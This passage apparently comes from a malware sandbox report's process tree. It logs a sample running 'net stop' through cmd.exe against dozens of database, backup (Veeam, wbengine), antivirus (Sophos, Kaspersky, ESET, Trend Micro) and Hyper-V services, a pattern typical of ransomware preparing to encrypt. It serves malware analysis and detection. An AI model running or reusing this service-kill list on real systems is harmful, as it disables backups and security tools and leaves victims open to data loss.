    net stop "MSSQLServerADHelper100"
    3⤵
    PID:812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
      4⤵
      PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
  2⤵
  PID:2620
- - C:\Windows\system32\net.exe
    net stop "MSSQLServerOLAPService"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
      4⤵
      PID:1164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MySQL80"
  2⤵
  PID:4884
- - C:\Windows\system32\net.exe
    net stop "MySQL80"
    3⤵
    PID:3048
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MySQL80"
      4⤵
      PID:3456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MySQL57"
  2⤵
  PID:864
- - C:\Windows\system32\net.exe
    net stop "MySQL57"
    3⤵
    PID:436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MySQL57"
      4⤵
      PID:1452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
  2⤵
  PID:4468
- - C:\Windows\system32\net.exe
    net stop "OracleClientCache80"
    3⤵
    PID:1460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "OracleClientCache80"
      4⤵
      PID:1700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
  2⤵
  PID:1348
- - C:\Windows\system32\net.exe
    net stop "PDVFSService"
    3⤵
    PID:1580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "PDVFSService"
      4⤵
      PID:2840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
  2⤵
  PID:4908
- - C:\Windows\system32\net.exe
    net stop "POP3Svc"
    3⤵
    PID:2348
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "POP3Svc"
      4⤵
      PID:1144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer"
  2⤵
  PID:5076
- - C:\Windows\system32\net.exe
    net stop "ReportServer"
    3⤵
    PID:3496
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer"
      4⤵
      PID:516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
  2⤵
  PID:756
- - C:\Windows\system32\net.exe
    net stop "ReportServer$SQL_2008"
    3⤵
    PID:824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
      4⤵
      PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
  2⤵
  PID:3596
- - C:\Windows\system32\net.exe
    net stop "ReportServer$SYSTEM_BGC"
    3⤵
    PID:2364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
      4⤵
      PID:2388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
  2⤵
  PID:2108
- - C:\Windows\system32\net.exe
    net stop "ReportServer$TPS"
    3⤵
    PID:4844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$TPS"
      4⤵
      PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
  2⤵
  PID:3044
- - C:\Windows\system32\net.exe
    net stop "ReportServer$TPSAMA"
    3⤵
    PID:644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
      4⤵
      PID:1844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "RESvc"
  2⤵
  PID:5056
- - C:\Windows\system32\net.exe
    net stop "RESvc"
    3⤵
    PID:4040
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "RESvc"
      4⤵
      PID:3524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "sacsvr"
  2⤵
  PID:2648
- - C:\Windows\system32\net.exe
    net stop "sacsvr"
    3⤵
    PID:608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "sacsvr"
      4⤵
      PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SamSs"
  2⤵
  PID:4556
- - C:\Windows\system32\net.exe
    net stop "SamSs"
    3⤵
    PID:976
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SamSs"
      4⤵
      PID:3008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
  2⤵
  PID:2408
- - C:\Windows\system32\net.exe
    net stop "SAVAdminService"
    3⤵
    PID:2104
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SAVAdminService"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SAVService"
  2⤵
  PID:2880
- - C:\Windows\system32\net.exe
    net stop "SAVService"
    3⤵
    PID:1176
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SAVService"
      4⤵
      PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Smcinst"
  2⤵
  PID:648
- - C:\Windows\system32\net.exe
    net stop "Smcinst"
    3⤵
    PID:2240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Smcinst"
      4⤵
      PID:4132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SmcService"
  2⤵
  PID:2872
- - C:\Windows\system32\net.exe
    net stop "SmcService"
    3⤵
    PID:1908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SmcService"
      4⤵
      PID:896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
  2⤵
  PID:3948
- - C:\Windows\system32\net.exe
    net stop "SMTPSvc"
    3⤵
    PID:1372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SMTPSvc"
      4⤵
      PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SNAC"
  2⤵
  PID:4196
- - C:\Windows\system32\net.exe
    net stop "SNAC"
    3⤵
    PID:3280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SNAC"
      4⤵
      PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SntpService"
  2⤵
  PID:2876
- - C:\Windows\system32\net.exe
    net stop "SntpService"
    3⤵
    PID:1796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SntpService"
      4⤵
      PID:420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "sophossps"
  2⤵
  PID:4312
- - C:\Windows\system32\net.exe
    net stop "sophossps"
    3⤵
    PID:3532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "sophossps"
      4⤵
      PID:924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
  2⤵
  PID:1656
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$BKUPEXEC"
    3⤵
    PID:4696
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
      4⤵
      PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
  2⤵
  PID:4260
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$ECWDB2"
    3⤵
    PID:2136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
      4⤵
      PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
  2⤵
  PID:1080
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PRACTTICEBGC"
    3⤵
    PID:272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
      4⤵
      PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
  2⤵
  PID:3400
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PRACTTICEMGT"
    3⤵
    PID:2280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
      4⤵
      PID:4780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
  2⤵
  PID:4220
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PROFXENGAGEMENT"
    3⤵
    PID:4784
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
      4⤵
      PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
  2⤵
  PID:3960
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SBSMONITORING"
    3⤵
    PID:1220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
      4⤵
      PID:3668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
  2⤵
  PID:820
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SHAREPOINT"
    3⤵
    PID:2864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
      4⤵
      PID:676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
  2⤵
  PID:1184
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SQL_2008"
    3⤵
    PID:2300
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
      4⤵
      PID:712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
  2⤵
  PID:4280
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SYSTEM_BGC"
    3⤵
    PID:3728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
      4⤵
      PID:2564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
  2⤵
  PID:1016
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$TPS"
    3⤵
    PID:1200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$TPS"
      4⤵
      PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
  2⤵
  PID:836
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$TPSAMA"
    3⤵
    PID:1236
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
      4⤵
      PID:3052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
  2⤵
  PID:812
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:1164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
  2⤵
  PID:4308
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:2480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:2472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
  2⤵
  PID:3468
- - C:\Windows\system32\net.exe
    net stop "SQLBrowser"
    3⤵
    PID:4368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLBrowser"
      4⤵
      PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
  2⤵
  PID:4840
- - C:\Windows\system32\net.exe
    net stop "SQLSafeOLRService"
    3⤵
    PID:1460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLSafeOLRService"
      4⤵
      PID:5084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
  2⤵
  PID:5068
- - C:\Windows\system32\net.exe
    net stop "SQLSERVERAGENT"
    3⤵
    PID:1580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLSERVERAGENT"
      4⤵
      PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
  2⤵
  PID:4360
- - C:\Windows\system32\net.exe
    net stop "SQLTELEMETRY"
    3⤵
    PID:2348
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLTELEMETRY"
      4⤵
      PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
  2⤵
  PID:2508
- - C:\Windows\system32\net.exe
    net stop "SQLTELEMETRY$ECWDB2"
    3⤵
    PID:1576
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
      4⤵
      PID:824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
  2⤵
  PID:4868
- - C:\Windows\system32\net.exe
    net stop "SQLWriter"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLWriter"
      4⤵
      PID:2364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
  2⤵
  PID:2060
- - C:\Windows\system32\net.exe
    net stop "SstpSvc"
    3⤵
    PID:4844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SstpSvc"
      4⤵
      PID:4928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3128
- - C:\Windows\system32\net.exe
    net stop "svcGenericHost"
    3⤵
    PID:3044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "svcGenericHost"
      4⤵
      PID:3524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "tmlisten"
  2⤵
  PID:4584
- - C:\Windows\system32\net.exe
    net stop "tmlisten"
    3⤵
    PID:608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "tmlisten"
      4⤵
      PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "TrueKey"
  2⤵
  PID:604
- - C:\Windows\system32\net.exe
    net stop "TrueKey"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "TrueKey"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
  2⤵
  PID:2740
- - C:\Windows\system32\net.exe
    net stop "UI0Detect"
    3⤵
    PID:4364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "UI0Detect"
      4⤵
      PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
  2⤵
  PID:4088
- - C:\Windows\system32\net.exe
    net stop "VeeamBackupSvc"
    3⤵
    PID:1128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamBackupSvc"
      4⤵
      PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
  2⤵
  PID:2800
- - C:\Windows\system32\net.exe
    net stop "VeeamBrokerSvc"
    3⤵
    PID:2520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamBrokerSvc"
      4⤵
      PID:1312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
  2⤵
  PID:2964
- - C:\Windows\system32\net.exe
    net stop "VeeamCatalogSvc"
    3⤵
    PID:1180
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamCatalogSvc"
      4⤵
      PID:3144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
  2⤵
  PID:1284
- - C:\Windows\system32\net.exe
    net stop "VeeamCloudSvc"
    3⤵
    PID:3928
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamCloudSvc"
      4⤵
      PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
  2⤵
  PID:1496
- - C:\Windows\system32\net.exe
    net stop "VeeamDeploymentService"
    3⤵
    PID:4552
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamDeploymentService"
      4⤵
      PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
  2⤵
  PID:4860
- - C:\Windows\system32\net.exe
    net stop "VeeamDeploySvc"
    3⤵
    PID:1020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamDeploySvc"
      4⤵
      PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
  2⤵
  PID:716
- - C:\Windows\system32\net.exe
    net stop "VeeamEnterpriseManagerSvc"
    3⤵
    PID:1372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
      4⤵
      PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
  2⤵
  PID:4460
- - C:\Windows\system32\net.exe
    net stop "VeeamMountSvc"
    3⤵
    PID:3288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamMountSvc"
      4⤵
      PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
  2⤵
  PID:3348
- - C:\Windows\system32\net.exe
    net stop "VeeamNFSSvc"
    3⤵
    PID:264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamNFSSvc"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
  2⤵
  PID:3256
- - C:\Windows\system32\net.exe
    net stop "VeeamRESTSvc"
    3⤵
    PID:3532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamRESTSvc"
      4⤵
      PID:368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
  2⤵
  PID:256
- - C:\Windows\system32\net.exe
    net stop "VeeamTransportSvc"
    3⤵
    PID:1632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamTransportSvc"
      4⤵
      PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "W3Svc"
  2⤵
  PID:1280
- - C:\Windows\system32\net.exe
    net stop "W3Svc"
    3⤵
    PID:2136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "W3Svc"
      4⤵
      PID:1940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "wbengine"
  2⤵
  PID:1048
- - C:\Windows\system32\net.exe
    net stop "wbengine"
    3⤵
    PID:272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wbengine"
      4⤵
      PID:4068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WRSVC"
  2⤵
  PID:1208
- - C:\Windows\system32\net.exe
    net stop "WRSVC"
    3⤵
    PID:4272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WRSVC"
      4⤵
      PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
  2⤵
  PID:3316
- - C:\Windows\system32\net.exe
    net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:5108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:1744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
  2⤵
  PID:1760
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:1220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
  2⤵
  PID:5052
- - C:\Windows\system32\net.exe
    net stop "VeeamHvIntegrationSvc"
    3⤵
    PID:1352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
      4⤵
      PID:3004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "swi_update"
  2⤵
  PID:3272
- - C:\Windows\system32\net.exe
    net stop "swi_update"
    3⤵
    PID:500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "swi_update"
      4⤵
      PID:3152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
  2⤵
  PID:1936
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$CXDB"
    3⤵
    PID:356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$CXDB"
      4⤵
      PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
  2⤵
  PID:1368
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$CITRIX_METAFRAME"
    3⤵
    PID:916
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
      4⤵
      PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
  2⤵
  PID:1164
- - C:\Windows\system32\net.exe
    net stop "SQL Backups"
    3⤵
    PID:4372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQL Backups"
      4⤵
      PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
  2⤵
  PID:1700
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PROD"
    3⤵
    PID:1852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PROD"
      4⤵
      PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
  2⤵
  PID:4020
- - C:\Windows\system32\net.exe
    net stop "Zoolz 2 Service"
    3⤵
    PID:4344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Zoolz 2 Service"
      4⤵
      PID:4060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
  2⤵
  PID:5068
- - C:\Windows\system32\net.exe
    net stop "MSSQLServerADHelper"
    3⤵
    PID:4048
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerADHelper"
      4⤵
      PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
  2⤵
  PID:756
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PROD"
    3⤵
    PID:824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PROD"
      4⤵
      PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
  2⤵
  PID:2364
- - C:\Windows\system32\net.exe
    net stop "msftesql$PROD"
    3⤵
    PID:2388
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "msftesql$PROD"
      4⤵
      PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
  2⤵
  PID:1612
- - C:\Windows\system32\net.exe
    net stop "NetMsmqActivator"
    3⤵
    PID:4904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "NetMsmqActivator"
      4⤵
      PID:4320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
  2⤵
  PID:1316
- - C:\Windows\system32\net.exe
    net stop "EhttpSrv"
    3⤵
    PID:5056
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "EhttpSrv"
      4⤵
      PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ekrn"
  2⤵
  PID:4932
- - C:\Windows\system32\net.exe
    net stop "ekrn"
    3⤵
    PID:1472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ekrn"
      4⤵
      PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
  2⤵
  PID:2052
- - C:\Windows\system32\net.exe
    net stop "ESHASRV"
    3⤵
    PID:4556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ESHASRV"
      4⤵
      PID:4052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
  2⤵
  PID:5008
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SOPHOS"
    3⤵
    PID:3268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
      4⤵
      PID:1672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
  2⤵
  PID:3184
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SOPHOS"
    3⤵
    PID:2408
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
      4⤵
      PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AVP"
  2⤵
  PID:4080
- - C:\Windows\system32\net.exe
    net stop "AVP"
    3⤵
    PID:2968
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AVP"
      4⤵
      PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "klnagent"
  2⤵
  PID:3216
- - C:\Windows\system32\net.exe
    net stop "klnagent"
    3⤵
    PID:1564
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "klnagent"
      4⤵
      PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
  2⤵
  PID:4384
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SQLEXPRESS"
    3⤵
    PID:5044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
      4⤵
      PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
  2⤵
  PID:4256
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SQLEXPRESS"
    3⤵
    PID:2208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
      4⤵
      PID:588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "wbengine"
  2⤵
  PID:748
- - C:\Windows\system32\net.exe
    net stop "wbengine"
    3⤵
    PID:1908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wbengine"
      4⤵
      PID:4424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "HvHost"
  2⤵
  PID:3280
- - C:\Windows\system32\net.exe
    net stop "HvHost"
    3⤵
    PID:3616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "HvHost"
      4⤵
      PID:4196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
  2⤵
  PID:420
- - C:\Windows\system32\net.exe
    net stop "vmickvpexchange"
    3⤵
    PID:4792
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmickvpexchange"
      4⤵
      PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
  2⤵
  PID:5032
- - C:\Windows\system32\net.exe
    net stop "vmicguestinterface"
    3⤵
    PID:4564
